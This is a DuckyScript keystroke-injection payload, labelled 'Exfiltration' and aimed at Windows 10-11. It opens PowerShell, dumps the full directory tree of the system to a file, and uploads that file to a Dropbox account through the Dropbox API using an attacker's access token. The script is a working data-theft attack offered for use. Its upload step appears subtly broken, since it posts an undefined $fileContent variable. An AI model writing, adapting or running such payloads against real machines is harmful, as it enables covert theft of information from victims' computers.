REM ###########################################################
REM #                                                         |
REM # Title        : Tree Structure Of The Operating System   |
REM # Author       : Aleff                                    |
REM # Version      : 1.0                                      |
REM # Category     : Exfiltration                             |
REM # Target       : Windows 10-11                            |
REM #                                                         |
REM ###########################################################

REM Requirements:
REM     - Internet connection

REM Set yout Dropbox access token
DEFINE #DROPBOX_ACCESS_TOKEN example

EXTENSION DETECT_READY
    REM VERSION 1.1
    REM AUTHOR: Korben

    REM_BLOCK DOCUMENTATION
        USAGE:
            Extension runs inline (here)
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
            boot delay

        TARGETS:
            Any system that reflects CAPSLOCK will detect minimum required delay
            Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
    END_REM

    REM CONFIGURATION:
    DEFINE #RESPONSE_DELAY 25
    DEFINE #ITERATION_LIMIT 120

    VAR $C = 0
    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
        CAPSLOCK
        DELAY #RESPONSE_DELAY
        $C = ($C + 1)
    END_WHILE
    CAPSLOCK
END_EXTENSION

GUI r
DELAY 1000
STRINGLN PowerShell
DELAY 1000

REM Setting about exfiltration
STRINGLN_BLOCK
    tree /f /a > out.txt
    $filePath=".\out.txt";
    $accessToken="#DROPBOX_ACCESS_TOKEN"
    $authHeader = @{Authorization = "Bearer $accessToken"}
    $dropboxFilePath = "/out_exported.txt"

    $uploadUrl = "https://content.dropboxapi.com/2/files/upload"

    $headers = @{}
    $headers.Add("Authorization", "Bearer $accessToken")
    $headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
    $headers.Add("Content-Type", "application/octet-stream")

    Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $fileContent; exit;
END_STRINGLN
